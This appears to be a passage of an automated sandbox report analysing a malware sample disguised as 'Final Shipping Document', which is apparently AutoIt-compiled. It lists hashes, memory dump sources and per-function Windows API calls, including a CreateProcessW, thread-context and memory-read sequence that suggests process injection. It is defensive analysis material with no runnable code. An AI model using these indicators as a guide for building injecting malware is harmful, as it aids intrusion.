                                                            • Instruction ID: bf1bfa340039808c59cde64d71eba973d2a55c605bf283d96eabdb58cccce3c2
                                                            • Opcode Fuzzy Hash: 0a303f8f3dcd6b5e092387cf10bd4301f2acae67242518e11bdb325694d0de68
                                                            • Instruction Fuzzy Hash: 80019230145225B6E7310A2ACC4EF9B7F98EF027B0F108350BA9C6A1E1CBB45954DB90
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00BA9879,?,?,?), ref: 00BA6E33
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00BA9879,?,?,?), ref: 00BA6E69
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide
                                                            • String ID:
                                                            • API String ID: 626452242-0
                                                            • Opcode ID: bedabde901fcac1cbfe99708e899c4d34ef887c7fa9bd15d002f42c0396992af
                                                            • Instruction ID: 096b20cbfeba8065545e9c40ae18b4705fdab39f97b8cb6efd01351fbf014e64
                                                            • Opcode Fuzzy Hash: bedabde901fcac1cbfe99708e899c4d34ef887c7fa9bd15d002f42c0396992af
                                                            • Instruction Fuzzy Hash: 3001D4713042007FEB196BB99C4BFBF7AEDDB85300F14007DB106DA1E1E9A0AC009630
                                                            APIs
                                                            • __Init_thread_footer.LIBCMT ref: 00BABB4E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            • Opcode ID: 7537579fdb9c84bd2abfc64b84f61ab911e0248d37b50bc95962ab15e50a9805
                                                            • Instruction ID: 74c19c669a48111007ee22fb4f9ca87e4cb4d491bc380a68d5d3dc17fcdfd8b0
                                                            • Opcode Fuzzy Hash: 7537579fdb9c84bd2abfc64b84f61ab911e0248d37b50bc95962ab15e50a9805
                                                            • Instruction Fuzzy Hash: 4932AD34A082099FDB10DF54C894FBEB7F9EF46310F148099EA25AB262D774ED85CB61
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01571A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01571AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01571B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2039525570.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1570000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                            • Instruction ID: 3c57e2ca2d2cbbd8f23e480fd92c8114db82908695af9f372885af9a25fe94b5
                                                            • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                            • Instruction Fuzzy Hash: F312DD24E24658C6EB24DF64D8507DEB232FF68300F1094E9910DEB7A5E77A4F81CB5A
                                                            APIs
                                                              • Part of subcall function 00BA4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E9C
                                                              • Part of subcall function 00BA4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BA4EAE
                                                              • Part of subcall function 00BA4E90: FreeLibrary.KERNEL32(00000000,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EC0
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EFD
                                                              • Part of subcall function 00BA4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E62
                                                              • Part of subcall function 00BA4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BA4E74
                                                              • Part of subcall function 00BA4E59: FreeLibrary.KERNEL32(00000000,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E87
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressFreeProc
                                                            • String ID:
                                                            • API String ID: 2632591731-0
                                                            • Opcode ID: 9335f787675ea644e025526f3b651b90fbab8db183f0c7752fabe467f171b803
                                                            • Instruction ID: 8e6407d895ed4c02fcbd2f57bb7480d1008f0a7fafd578079af00bfac09529d9
                                                            • Opcode Fuzzy Hash: 9335f787675ea644e025526f3b651b90fbab8db183f0c7752fabe467f171b803
                                                            • Instruction Fuzzy Hash: 46110132618205AACB24AB60DC42FED77E4AF81B10F2084ADF456B61C1EFB1EA049750
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: __wsopen_s
                                                            • String ID:
                                                            • API String ID: 3347428461-0
                                                            • Opcode ID: 289625f387150c380de3b1124fda8b40cd4b4d0077313bfcb0522dba657b4a0c
                                                            • Instruction ID: a6736b1b8189ca2027441526837aacce89d638ad8d93be51d880dbf9cb11cfb4
                                                            • Opcode Fuzzy Hash: 289625f387150c380de3b1124fda8b40cd4b4d0077313bfcb0522dba657b4a0c
                                                            • Instruction Fuzzy Hash: 5B11187590410AAFCB05DF58E941A9EBBF5EF48315F10409AF808AB312EB31EA11CBA5
                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00BA543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00BA9A9C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 53cd387e20cc0ad84c4ee7a0e768ad6c5db2a1a546e13cd2c4b2362cee6f5992
                                                            • Instruction ID: 132e2352af4a6742c572d085a6bbd15dcd16b2205974e78199341ac7fa8ae82e
                                                            • Opcode Fuzzy Hash: 53cd387e20cc0ad84c4ee7a0e768ad6c5db2a1a546e13cd2c4b2362cee6f5992
                                                            • Instruction Fuzzy Hash: 7B114832208B059FD720CF15C880B66B7F9EF45764F10C46EE9AB8AA51C770F945EB60
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                            • Instruction ID: 8fa45faa1acfc3a790a104d441f2be8ecb1f430999cbf6bab9cfffb3cfd8efc4
                                                            • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                            • Instruction Fuzzy Hash: 49F0D136521A10D6C6312A799C05F5A73DC9F62331F1007FEF431962D2EB74E80186A5
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 9c5f78b3427383a38971572370fc9e293e072ed864d10e9fe537db0d597398e6
                                                            • Instruction ID: d19fa98aff6c437292b558cb8e5c1af4a9c25df0d1667f0b69002c638c3dbce3
                                                            • Opcode Fuzzy Hash: 9c5f78b3427383a38971572370fc9e293e072ed864d10e9fe537db0d597398e6
                                                            • Instruction Fuzzy Hash: 40E0E53120062596D72126669C00F9EBACAEB42FB0F0900E6BC0496692FB52DE01A3E2
                                                            APIs
                                                            • FreeLibrary.KERNEL32(?,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4F6D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: 04fdcc3eb9afffdf4ee60d1aedf11d51fcba5f06e99f2a16c6990c654fc0c756
                                                            • Instruction ID: 21500f50dec0f38ffafcb2b33b58966c143d6ea654afe4d58f5d4c4c1a1df0a6
                                                            • Opcode Fuzzy Hash: 04fdcc3eb9afffdf4ee60d1aedf11d51fcba5f06e99f2a16c6990c654fc0c756
                                                            • Instruction Fuzzy Hash: AFF0A971009342CFCB348F20D4D0926BBE0EF4232932099BEE1EE82620C7B29844EF00
                                                            APIs
                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BA2DC4
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_wcslen
                                                            • String ID:
                                                            • API String ID: 541455249-0
                                                            • Opcode ID: 97b150eb587755d5b6787e175e2ad53dc8c3040c95d2b7ac1c4fd9cc4d802c97
                                                            • Instruction ID: 7ff2aad9927b9c32ef9265d81173c0603f1f13ea7cd3baeb5a507e829f469df2
                                                            • Opcode Fuzzy Hash: 97b150eb587755d5b6787e175e2ad53dc8c3040c95d2b7ac1c4fd9cc4d802c97
                                                            • Instruction Fuzzy Hash: BCE0C2B2A042245BCB21A2989C06FEE77EDDFC8790F0400B1FD09E7248DA70AD8086A0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                            • Instruction ID: 73931d5e4961ea489cebaffdaf34732921d92e89d4ee116c9e83bb36f9ad8383
                                                            • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                            • Instruction Fuzzy Hash: AEE048B46097005FDF395A28A8517F677D49F4A300F00045EF5AB82352E5726855964D
                                                            APIs
                                                              • Part of subcall function 00BA3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BA3908
                                                              • Part of subcall function 00BAD730: GetInputState.USER32 ref: 00BAD807
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00BA2B6B
                                                              • Part of subcall function 00BA30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00BA314E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                            • String ID:
                                                            • API String ID: 3667716007-0
                                                            • Opcode ID: e2f64e3a5cd8b4a281418dcec9ac47b860a156821fb4ecfade232dc197ec6bfd
                                                            • Instruction ID: 0dfa7a4822861e06f2200394e4163edca7e75a1fda7a277f46385f1528906e64
                                                            • Opcode Fuzzy Hash: e2f64e3a5cd8b4a281418dcec9ac47b860a156821fb4ecfade232dc197ec6bfd
                                                            • Instruction Fuzzy Hash: E0E0863230C24407CA08BB78A8566BDA7D9DBD3751F4455BEF54753162CE2549494351
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,00000000,?,00BE0704,?,?,00000000,?,00BE0704,00000000,0000000C), ref: 00BE03B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: d78bbfb6294b15b031dc30e3127ac009dde8d443daf58e21cdd09328d1cad1d2
                                                            • Instruction ID: 3cc84f7dd9126b4b376c48b0668a263ad53a2109b4972fa5bb7d7412beff5882
                                                            • Opcode Fuzzy Hash: d78bbfb6294b15b031dc30e3127ac009dde8d443daf58e21cdd09328d1cad1d2
                                                            • Instruction Fuzzy Hash: F2D06C3205010DBBDF028F84DD46EDE3BAAFB48714F014000BE1866020C732E821AB90
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00BA1CBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem
                                                            • String ID:
                                                            • API String ID: 3098949447-0
                                                            • Opcode ID: 7709a27e67345eca47b616fb774b9322a94496ac67a05e789f7669d6458fb733
                                                            • Instruction ID: 3610ffe388d51e4f088d85643309c2dd117da9d5fd5c58a8e247d8c4b16269eb
                                                            • Opcode Fuzzy Hash: 7709a27e67345eca47b616fb774b9322a94496ac67a05e789f7669d6458fb733
                                                            • Instruction Fuzzy Hash: 8DC09B36290304DFF3144B94BC4AF1C7754A348B00F044001F64D655F3C3A11450F750
                                                            APIs
                                                            • GetTempPathW.KERNELBASE(00000104,?), ref: 00BFD8E9
                                                              • Part of subcall function 00BA33A7: _wcslen.LIBCMT ref: 00BA33AB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: PathTemp_wcslen
                                                            • String ID:
                                                            • API String ID: 1974555822-0
                                                            • Opcode ID: 65ec347b5008c6d053f39a7dc5b0550d07da16e554b94fd96a6e4a252da036b9
                                                            • Instruction ID: 1f82fd5e859fa36f4e80ab81f0ac15383979f63480050d36c8ccd6fdfe41aab6
                                                            • Opcode Fuzzy Hash: 65ec347b5008c6d053f39a7dc5b0550d07da16e554b94fd96a6e4a252da036b9
                                                            • Instruction Fuzzy Hash: 0EC04C7451501E9BDB909790CCC9BBD73A4EF00701F1040D5F205510509E715A489B12
                                                            APIs
                                                              • Part of subcall function 00BA5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00BA949C,?,00008000), ref: 00BA5773
                                                            • GetLastError.KERNEL32(00000002,00000000), ref: 00C176DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorFileLast
                                                            • String ID:
                                                            • API String ID: 1214770103-0
                                                            • Opcode ID: 53ef001b14f12405d71d1e56e7fea8e8bc0c9d63905107e97025a231107c4c2f
                                                            • Instruction ID: d37116860e8317b45dde097dc74cd136926e98896a0ab53a70a60515c092b09b
                                                            • Opcode Fuzzy Hash: 53ef001b14f12405d71d1e56e7fea8e8bc0c9d63905107e97025a231107c4c2f
                                                            • Instruction Fuzzy Hash: 858181306087019FCB14EF28C491BA9B7F1BF8A350F04465DF8965B292DB34EE85DB92
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 182fe8f8996360e5b2391b347e9a4fb8961b35c0c630172aea8f7baf5e4578f7
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: 6B31BD75A0010A9BC718CF59D880AB9FBE6FB49300B2486F5E809CB656D771EDC1CB80
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 015722B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2039525570.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1570000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: e8fd304faee604f5393d9c74ca68dc5af2384747cb2c40a538df131ad6dd5527
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 95E0E67494010EDFDB00EFB4D54969E7FB4FF04301F100161FD05D2281D6309D508A72
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C3961A
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C3965B
                                                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00C3969F
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C396C9
                                                            • SendMessageW.USER32 ref: 00C396F2
                                                            • GetKeyState.USER32(00000011), ref: 00C3978B
                                                            • GetKeyState.USER32(00000009), ref: 00C39798
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C397AE
                                                            • GetKeyState.USER32(00000010), ref: 00C397B8
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C397E9
